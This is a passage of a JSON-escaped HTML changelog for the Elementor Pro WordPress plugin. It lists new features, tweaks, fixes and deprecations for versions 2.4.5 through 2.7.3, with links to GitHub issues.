issue<\\/li>\\n<li>Fix: Product Variations Clear button not working in edge cases<\\/li>\\n<li>Fix: Styling issues in Form widget submit button<\\/li>\\n<\\/ul>\\n<h4>2.7.3 - 2019-10-28<\\/h4>\\n<ul>\\n<li>Tweak: Added RTL support to Galleries widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9213\\\">#9213<\\/a>)<\\/li>\\n<li>Tweak: Added Custom Icons compatibility for WordPress 5.3<\\/li>\\n<li>Fix: Missing template function declaration causes fatal error in WC mini-cart widget<\\/li>\\n<li>Fix: Pause on hover doesn't work in Carousel widgets<\\/li>\\n<li>Fix: Link-actions conflict with <code>?action=<\\/code> parameter in the URL<\\/li>\\n<li>Fix: Lightbox navigation not working in Gallery widget Single mode<\\/li>\\n<li>Fix: Ken burns effect not working on the 1st slide if Infinite Loop option is turned off in Carousel widgets<\\/li>\\n<li>Fix: Popup Advanced Rules detects internal links as external if current URL starts with <code>www<\\/code><\\/li>\\n<\\/ul>\\n<h4>2.7.2 - 2019-10-06<\\/h4>\\n<ul>\\n<li>Fix: Slide Overlay not working when applying Ken burns effect in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9209\\\">#9209<\\/a>)<\\/li>\\n<li>Fix: Content width glitch in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9180\\\">#9180<\\/a>)<\\/li>\\n<li>Fix: Horizontal Alignment not working when applying custom style per slide in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9180\\\">#9180<\\/a>)<\\/li>\\n<li>Fix: Missing semicolon in Custom Fonts <code>font-display<\\/code> CSS<\\/li>\\n<\\/ul>\\n<h4>2.7.1 - 2019-09-26<\\/h4>\\n<ul>\\n<li>Fix: Background Overlay layer is over the slide content in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9180\\\">#9180<\\/a>)<\\/li>\\n<li>Fix: Duplicate images under "All" filter in Multiple Gallery<\\/li>\\n<\\/ul>\\n<h4>2.7.0 - 2019-09-24<\\/h4>\\n<ul>\\n<li>New: Enhanced Galleries widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1898\\\">#1898<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3103\\\">#3103<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4279\\\">#4279<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7631\\\">#7631<\\/a>)<\\/li>\\n<li>New: Dynamic Number (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5952\\\">#5952<\\/a>)<\\/li>\\n<li>New: Full content skin for Posts and Archive-posts widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4617\\\">#4617<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic number capability to Price List, Price Table, Counter, Star Rating, Progress Bar widgets<\\/li>\\n<li>Tweak: Added tags support to forms Mailchimp action (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5418\\\">#5418<\\/a>)<\\/li>\\n<li>Tweak: User Profile Picture Dynamic Tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7947\\\">#7947<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8740\\\">#8740<\\/a>)<\\/li>\\n<li>Tweak: Added <code>font-display<\\/code> support to custom fonts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5993\\\">#5993<\\/a>, <a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-pro-2-7-custom-fonts-font-display-support\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added Text Shadow control to Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8800\\\">#8800<\\/a>)<\\/li>\\n<li>Tweak: Added Re-subscribe support to MailerLite (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8799\\\">#8799<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities to Facebook Embed widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9030\\\">#9030<\\/a>)<\\/li>\\n<li>Tweak: Use <code>swiper.js<\\/code> instead of <code>slick.js<\\/code> in Slides widget (<a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-2-7-moving-sliders-from-slick-to-swiper\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/search_form\\/before_input<\\/code> action hook to Search Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5598\\\">#5598<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/search_form\\/after_input<\\/code> action hook to Search Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5598\\\">#5598<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic support for Custom field key (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7789\\\">#7789<\\/a>)<\\/li>\\n<li>Tweak: Increased expired license notice bar frequency<\\/li>\\n<li>Tweak: Changed the icon name of Slides widget<\\/li>\\n<li>Tweak: Added designated Finder's Icons for Custom icons & Custom fonts<\\/li>\\n<li>Tweak: Use Ken Burns Effect as an external module<\\/li>\\n<li>Tweak: Remove Fontello conflicting CSS on import to Custom Icons sets<\\/li>\\n<li>Tweak: Editor Panel UI tweaks<\\/li>\\n<li>Tweak: Added DOM events on Popup show\\/hide (<a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-pro-2-7-popup-events\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added option to change the variations field width in Add to Cart widget<\\/li>\\n<li>Tweak: Use select control instead of select2 in Menu Cart widget<\\/li>\\n<li>Tweak: Added conditions to the tabs instead of to each control in Share Buttons widget<\\/li>\\n<li>Tweak: Added Typography controls to HTML field in Forms widget<\\/li>\\n<li>Tweak: Allow edit selected Font file in Custom Font<\\/li>\\n<li>Tweak: Changed reCAPTCHA v3 error message<\\/li>\\n<li>Tweak: Remove the "Save as Global" option on Global widget context menu<\\/li>\\n<li>Fix: Corrected selector for <code>removeControlSpinner()<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8790\\\">#8790<\\/a>)<\\/li>\\n<li>Fix: Slides widget navigation icons misplacement (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8533\\\">#8533<\\/a>)<\\/li>\\n<li>Fix: Horizontal Scrollbar when Slider widget is set to Full Width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8527\\\">#8527<\\/a>)<\\/li>\\n<li>Fix: Inconsistent behavior when "Infinite Loop" enabled with "Autoplay" in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6726\\\">#6726<\\/a>)<\\/li>\\n<li>Fix: Ken Burns effect on Chrome transition glitches (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1671\\\">#1671<\\/a>)<\\/li>\\n<li>Fix: Nothing found message shows up inside the columns set in Posts Archive widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7347\\\">#7347<\\/a>)<\\/li>\\n<li>Fix: Responsive UI glitch in Popup Conditions modal tabs<\\/li>\\n<li>Fix: Removed unnecessary divider in Call to Action widget<\\/li>\\n<li>Fix: Custom Add To Cart * button style (size, position and background color) when <code>quantity<\\/code> is enabled.<\\/li>\\n<li>Fix: Add support for Document\\/PageBase in Theme Builder (Core >=2.7.0)<\\/li>\\n<li>Fix: Ampersand character breaks email link in Share Buttons widget<\\/li>\\n<li>Fix: Correct custom font attachment <code>mime-type<\\/code> to show uploaded Custom Fonts<\\/li>\\n<li>Fix: Mini-Cart not refreshing in Menu Cart widget<\\/li>\\n<li>Fix: Cart drawer not working when WC Subscriptions plugin is activated<\\/li>\\n<li>Fix: Querying CPT with custom taxonomies does not show the taxonomies before saving<\\/li>\\n<li>Fix: Double rendering on change caused console error in Theme Builder's conditions screen<\\/li>\\n<li>Fix: Translations and Strings in Share Buttons widget<\\/li>\\n<li>Fix: Avoid using offset if the source is Manual selection in Query Control<\\/li>\\n<li>Fix: Form being submitted although reCAPTCHA v3 validation failed in Forms widget<\\/li>\\n<\\/ul>\\n<h4>2.6.5 - 2019-08-26<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.7<\\/li>\\n<li>Fix: Button style not working when <code>quantity<\\/code> is enabled in Custom Add To Cart widget<\\/li>\\n<li>Fix: Updated minified JS file fixed WhatsApp base URL in Share Buttons widget<\\/li>\\n<\\/ul>\\n<h4>2.6.4 - 2019-08-21<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.7<\\/li>\\n<li>Fix: Changed WhatsApp base URL in Share Buttons widget for cross-device compatibility<\\/li>\\n<li>Fix: Random slides order after several clicks on pagination in Testimonial Carousel widget<\\/li>\\n<\\/ul>\\n<h4>2.6.3 - 2019-08-18<\\/h4>\\n<ul>\\n<li>Fix: Core version rollback to <code>>2.6.0<\\/code> causes a fatal error<\\/li>\\n<li>Fix: Duplicate images when slideshow skin is selected in Media Carousel lightbox<\\/li>\\n<li>Fix: Default bottom margin added to reCAPTCHA V3 badge<\\/li>\\n<li>Fix: Input glitch in reCAPTCHA V3 threshold settings<\\/li>\\n<\\/ul>\\n<h4>2.6.2 - 2019-07-30<\\/h4>\\n<ul>\\n<li>Tweak: Better accessibility support in Search Form widget<\\/li>\\n<li>Fix: UI glitched in Popup publish screen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8616\\\">#8616<\\/a>)<\\/li>\\n<li>Fix: "Child of Term" and "Any child of term" conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8695\\\">#8695<\\/a>)<\\/li>\\n<li>Fix: Restored <code>library_widget_templates<\\/code> action hook for 3rd party compatibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8687\\\">#8687<\\/a>)<\\/li>\\n<li>Fix: Twitter Icon missing in Blockquote widget<\\/li>\\n<li>Fix: Form reCAPTCHA v3 badge position not working<\\/li>\\n<li>Fix: Renewal notice bar appears in wrong situations<\\/li>\\n<li>Fix: Draft Icon Set loads empty Icon Library<\\/li>\\n<\\/ul>\\n<h4>2.6.1 - 2019-07-24<\\/h4>\\n<ul>\\n<li>Fix: Query Control autocomplete not retrieving results (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8672\\\">#8672<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8661\\\">#8661<\\/a>)<\\/li>\\n<li>Fix: Price Table features section not working (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8660\\\">#8660<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.6.0 - 2019-07-23<\\/h4>\\n<ul>\\n<li>New: Introducing Custom Icon sets - including Fontello, IcoMoon and Fontastic support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/110\\\">#110<\\/a>)<\\/li>\\n<li>New: Added Font Awesome 5 Pro integration including 5,300+ icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4430\\\">#4430<\\/a>)<\\/li>\\n<li>New: Added reCAPTCHA v3 integration to Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8213\\\">#8213<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6039\\\">#6039<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7165\\\">#7165<\\/a>)<\\/li>\\n<li>Tweak: Added Exit Animation for Popups (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7063\\\">#7063<\\/a>)<\\/li>\\n<li>Tweak: Added ACF Dynamic tag support for archive pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5147\\\">#5147<\\/a>)<\\/li>\\n<li>Tweak: Added Navigator Indicators for Custom CSS & Motion Effects (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2180\\\">#2180<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities for Form Redirect action (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7552\\\">#7552<\\/a>)<\\/li>\\n<li>Tweak: Added Logged In Message styling options for Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7928\\\">#7928<\\/a>)<\\/li>\\n<li>Tweak: Added <code>none<\\/code> breakpoint option to Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7916\\\">#7916<\\/a>)<\\/li>\\n<li>Tweak: Added option to place Post Terms dynamic tag without links (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8366\\\">#8366<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor\\/query\\/query_results<\\/code> hook to Query Control to allow full control over results (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7912\\\">#7912<\\/a>)<\\/li>\\n<li>Tweak: Allow choosing Heading HTML tag in Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8090\\\">#8090<\\/a>)<\\/li>\\n<li>Tweak: Show popup on dynamic click even when <code>Avoid Multiple Popups<\\/code> option is selected (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8189\\\">#8189<\\/a>)<\\/li>\\n<li>Tweak: Added condition option to all of archive child pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8256\\\">#8256<\\/a>)<\\/li>\\n<li>Tweak: Added <code>Effects Relative To<\\/code> control to Scrolling Effects<\\/li>\\n<li>Tweak: Allow shortcodes in HTML Form field<\\/li>\\n<li>Tweak: Removed donReach integration from Share Buttons widget due to service inconsistent stability<\\/li>\\n<li>Tweak: Changed MailChimp <code>List<\\/code> label to <code>Audience<\\/code><\\/li>\\n<li>Tweak: Improved Entrance and Exit animation behavior in Popup<\\/li>\\n<li>Tweak: Added <code>Deprecated Notice<\\/code> control to <code>Archive Products<\\/code> and <code>Woo Products<\\/code> widgets<\\/li>\\n<li>Tweak: Added default dynamic title for archives in Theme Builder<\\/li>\\n<li>Tweak: Added condition to show <code>Centered Slides<\\/code> control in Media Carousel widget<\\/li>\\n<li>Tweak: Added notice bar in the Editor when the license is expired or not activated<\\/li>\\n<li>Tweak: Replaced <code>select<\\/code> control with <code>choose<\\/code> control in Price List widget<\\/li>\\n<li>Tweak: Removed Font Awesome 4 dependencies from the Editor<\\/li>\\n<li>Tweak: Minor styling tweaks in the Popup publish modal<\\/li>\\n<li>Tweak: Hide ordering form in Products widget on front page<\\/li>\\n<li>Tweak: Removed page title markup when 'Hide Title' is active<\\/li>\\n<li>Tweak: Added style controls for HTML field in Form widget<\\/li>\\n<li>Fix: Form widget Date picker makes the Popup builder disappear (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7240\\\">#7240<\\/a>)<\\/li>\\n<li>Fix: Sticky element stop point stops working on viewport resize (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7884\\\">#7884<\\/a>)<\\/li>\\n<li>Fix: Copy-Paste style not pasting the Pointer option in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8497\\\">#8497<\\/a>)<\\/li>\\n<li>Fix: Missing Print icon in Share Buttons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8506\\\">#8506<\\/a>)<\\/li>\\n<li>Fix: UI style glitch in Blockquote widget when viewing from iPad<\\/li>\\n<li>Deprecated: <code>DB::save_editor()<\\/code> - Remove usage of this method (<a href=\\\"https:\\/\\/developers.elementor.com\\/v2-6-0-planned-deprecations\\/\\\">Deprecation Post<\\/a>)<\\/li>\\n<li>Deprecated: <code>DB::get_plain_editor()<\\/code> - Remove usage of this method (<a href=\\\"https:\\/\\/developers.elementor.com\\/v2-6-0-planned-deprecations\\/\\\">Deprecation Post<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.14 - 2019-07-14<\\/h4>\\n<ul>\\n<li>Fix: Better WC Related Product grid support to various themes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8555\\\">#8555<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.13 - 2019-07-11<\\/h4>\\n<ul>\\n<li>Fix: Better WC grid support to various themes<\\/li>\\n<\\/ul>\\n<h4>2.5.12 - 2019-07-10<\\/h4>\\n<ul>\\n<li>Fix: Grid for WooCommerce Archive Product widget<\\/li>\\n<li>Fix: Remove redundant <code>whitespace<\\/code> CSS property causes style glitch in iPad<\\/li>\\n<li>Tweak: Added more compatibility for Elementor v2.6<\\/li>\\n<\\/ul>\\n<h4>2.5.11 - 2019-07-02<\\/h4>\\n<ul>\\n<li>Fix: Close icon missing from Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8460\\\">#8460<\\/a>)<\\/li>\\n<li>Fix: Elementor Pro v2.5.10 shows PHP notice regarding notice bar (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8461\\\">#8461<\\/a>)<\\/li>\\n<li>Fix: Fatal error when deleting used Pods fields (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8396\\\">#8396<\\/a>)<\\/li>\\n<li>Fix: Missing dropdown icon in conditions screen<\\/li>\\n<\\/ul>\\n<h4>2.5.10 - 2019-05-28<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.6<\\/li>\\n<li>Tweak: Error caused by empty Rows & Columns values in Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8261\\\">#8261<\\/a>)<\\/li>\\n<li>Fix: Do not unset <code>product<\\/code> CPT if it's not from WooCommerce (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8160\\\">#8160<\\/a>)<\\/li>\\n<li>Fix: Column Spacing not working in WooCommerce Archive Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8285\\\">#8285<\\/a>)<\\/li>\\n<li>Fix: Title styling not working in Products Categories widget<\\/li>\\n<li>Fix: Empty value in Dynamic Pods Gallery dropdown using Safari browser<\\/li>\\n<li>Fix: WooCommerce archives included in "All Archives" condition<\\/li>\\n<\\/ul>\\n<h4>2.5.9 - 2019-05-28<\\/h4>\\n<ul>\\n<li>Tweak: Removed <code>auto-confirm<\\/code> control from MailPoet to support new version of MailPoet<\\/li>\\n<li>Fix: Multiple Custom Fonts not rendered in the editor<\\/li>\\n<li>Fix: Products <code>sale<\\/code> query - handle exclude by manual selection.<\\/li>\\n<li>Fix: Product Categories grid row & column style<\\/li>\\n<li>Fix: Form integration AJAX cache override<\\/li>\\n<li>Fix: Removed redundant CSS on Canvas & Header-Footer page templates<\\/li>\\n<\\/ul>\\n<h4>2.5.8 - 2019-05-06<\\/h4>\\n<ul>\\n<li>Fix: Popup entrance animation not working in frontend<\\/li>\\n<li>Fix: Popup Exit Intent trigger activated multiple times<\\/li>\\n<\\/ul>\\n<h4>2.5.7 - 2019-05-05<\\/h4>\\n<ul>\\n<li>Fix: Embedded video keeps playing after a Popup is closed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7875\\\">#7875<\\/a>)<\\/li>\\n<li>Fix: Maximum call stack size exceeded error in Safari (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7824\\\">#7824<\\/a>)<\\/li>\\n<li>Fix: Entrance animations not appearing on Popup reopen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7395\\\">#7395<\\/a>)<\\/li>\\n<li>Fix: WC variations select style glitch in several themes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8008\\\">#8008<\\/a>)<\\/li>\\n<li>Fix: Theme Builder taxonomy conditions not retrieving proper results in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.5.6 - 2019-04-29<\\/h4>\\n<ul>\\n<li>Tweak: Removed <code>Shortcode<\\/code> dynamic from Image, Gallery and Media control<\\/li>\\n<li>Fix: Popup not inheriting entrance animation in responsive mode (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7809\\\">#7809<\\/a>)<\\/li>\\n<li>Fix: Terms autocomplete retrieves wrong results in Query Control<\\/li>\\n<li>Fix: Query Control Related by author glitches in edge cases<\\/li>\\n<li>Fix: Query Control using terms for Products widget<\\/li>\\n<li>Fix: Posts cards style glitch in small screens<\\/li>\\n<li>Fix: Display conditions delete icon missing in small screens<\\/li>\\n<li>Fix: Avoid rendering Menu Cart widget in WordPress native editor<\\/li>\\n<\\/ul>\\n<h4>2.5.5 - 2019-04-08<\\/h4>\\n<ul>\\n<li>Tweak: Allow text selection inside a Popup<\\/li>\\n<li>Fix: Added backwards compatibility for <code>tax_query<\\/code> in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7751\\\">#7751<\\/a>)<\\/li>\\n<li>Fix: Missing arguments for <code>widget_title<\\/code> filter (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7745\\\">#7745<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.4 - 2019-04-03<\\/h4>\\n<ul>\\n<li>Fix: Move Query from using <code>term_id<\\/code> to <code>term_taxonomy_id<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7653\\\">#7653<\\/a>)<\\/li>\\n<li>Fix: Offset manipulation hook removal in Query control<\\/li>\\n<li>Fix: Missing form field <code>ID<\\/code> in some edge cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7711\\\">#7711<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7660\\\">#7660<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.3 - 2019-03-31<\\/h4>\\n<ul>\\n<li>Tweak: Updated Google Calendar dynamic tag URL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7673\\\">#7673<\\/a>)<\\/li>\\n<li>Fix: Missing form field names (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7651\\\">#7651<\\/a>)<\\/li>\\n<li>Fix: PHP 5.4 backward compatibility in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7633\\\">#7633<\\/a>)<\\/li>\\n<li>Fix: <code>products_deprecated<\\/code> Query Control module compatibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7654\\\">#7654<\\/a>)<\\/li>\\n<li>Fix: Changed query method from <code>term_id<\\/code> to <code>term_taxonomy_id<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7653\\\">#7653<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.2 - 2019-03-27<\\/h4>\\n<ul>\\n<li>Fix: Overwrite parent widget type in Global Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7632\\\">#7632<\\/a>)<\\/li>\\n<li>Fix: Avoid Duplicates option not working in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7635\\\">#7635<\\/a>)<\\/li>\\n<li>Fix: Manual Selection option not working in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7634\\\">#7634<\\/a>)<\\/li>\\n<li>Fix: Incorrect condition caused handlers issues inside popup<\\/li>\\n<\\/ul>\\n<h4>2.5.1 - 2019-03-26<\\/h4>\\n<ul>\\n<li>Fix: Query Control invalid call to deprecated action (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7619\\\">#7619<\\/a>)<\\/li>\\n<li>Tweak: Renamed action hook from <code>elementor_pro\\/{$widget_name}\\/query\\/{$query_id}<\\/code> to <code>elementor\\/query\\/{$query_id}<\\/code><\\/li>\\n<li>Tweak: Renamed filter hook from <code>elementor_pro\\/query_control\\/get_query_args\\/current_query<\\/code> to <code>elementor\\/query\\/get_query_args\\/current_query<\\/code><\\/li>\\n<\\/ul>\\n<h4>2.5.0 - 2019-03-26<\\/h4>\\n<ul>\\n<li>New: Introducing Motion Effects including Scrolling & Mouse effects (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/72\\\">#72<\\/a>)<\\/li>\\n<li>New: Introducing Related Posts for Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7306\\\">#7306<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7490\\\">#7490<\\/a>)<\\/li>\\n<li>New: Introducing Date query for Query Control<\\/li>\\n<li>New: Introducing Sticky Posts support for Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2501\\\">#2501<\\/a>)<\\/li>\\n<li>Tweak: Added option to open a Popup by a custom selector (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6871\\\">#6871<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6876\\\">#6876<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7258\\\">#7258<\\/a>)<\\/li>\\n<li>Tweak: Option to count when Popup is closed in "Show up to X times" Advanced Rule<\\/li>\\n<li>Tweak: Added full border radius control options inside Popup<\\/li>\\n<li>Tweak: Changed exit intent icon in Popups<\\/li>\\n<li>Tweak: Show only one popup in its own preview<\\/li>\\n<li>Tweak: Added responsive support to Popup entrance animation control<\\/li>\\n<li>Tweak: Conditions - Singular <code>All Pages<\\/code> string changed to <code>Pages<\\/code><\\/li>\\n<li>Tweak: Added form field shortcode support for Drip tags (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7000\\\">#7000<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities to Price List widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7258\\\">#7258<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities to Custom Attributes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6779\\\">#6779<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities to Flip Box widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6986\\\">#6986<\\/a>)<\\/li>\\n<li>Tweak: Decrease <code>z-index<\\/code> for Nav Menu (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6869\\\">#6869<\\/a>)<\\/li>\\n<li>Tweak: Changed "Scrolling Effects" section label to "Motion Effects"<\\/li>\\n<li>Tweak: Use filter <code>get_meta_viewport<\\/code> for header templates (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7043\\\">#7043<\\/a>)<\\/li>\\n<li>Tweak: use filterable <code>Util::get_public_post_types()<\\/code> in Theme Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7172\\\">#7172<\\/a>)<\\/li>\\n<li>Tweak: Added Cloudflare rocket-loader support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7443\\\">#7443<\\/a>)<\\/li>\\n<li>Tweak: Added responsive support to WC Products Columns & Rows Gap controls (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6913\\\">#6913<\\/a>)<\\/li>\\n<li>Tweak: WC Menu cart "View Cart" & "Checkout" buttons styling<\\/li>\\n<li>Fix: Custom ID reset to default when dragging repeater<\\/li>\\n<li>Fix: Conflict between archive-products widget and WC customizer<\\/li>\\n<li>Fix: Add to Cart widget <code>spacing<\\/code> and <code>space-between<\\/code><\\/li>\\n<li>Fix: Library view when creating a new Header or Footer<\\/li>\\n<li>Fix: Post types labels missing on Add New Template modal<\\/li>\\n<\\/ul>\\n<h4>2.4.8 - 2019-03-11<\\/h4>\\n<ul>\\n<li>Fix: Missing query section in Products widget<\\/li>\\n<li>Fix: Missing Taxonomy controls in Products widget in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.4.7 - 2019-03-06<\\/h4>\\n<ul>\\n<li>Fix: Compatibility Global Widget with Elementor v2.5.0+<\\/li>\\n<\\/ul>\\n<h4>2.4.6 - 2019-03-04<\\/h4>\\n<ul>\\n<li>Fix: Pods gallery dynamic when empty (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7127\\\">#7127<\\/a>)<\\/li>\\n<li>Fix: Duplicate call for conditions screen issue<\\/li>\\n<li>Fix: Compatibility with Elementor v2.5.0<\\/li>\\n<\\/ul>\\n<h4>2.4.5 - 2019-02-18<\\/h4>\\n<ul>\\n<li>Fix: Image size issue in Testimonial Carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7058\\\">#7058<\\/a>)<\\/li>\\n<li>Fix: MailChimp groups not saved in a form integration (<a 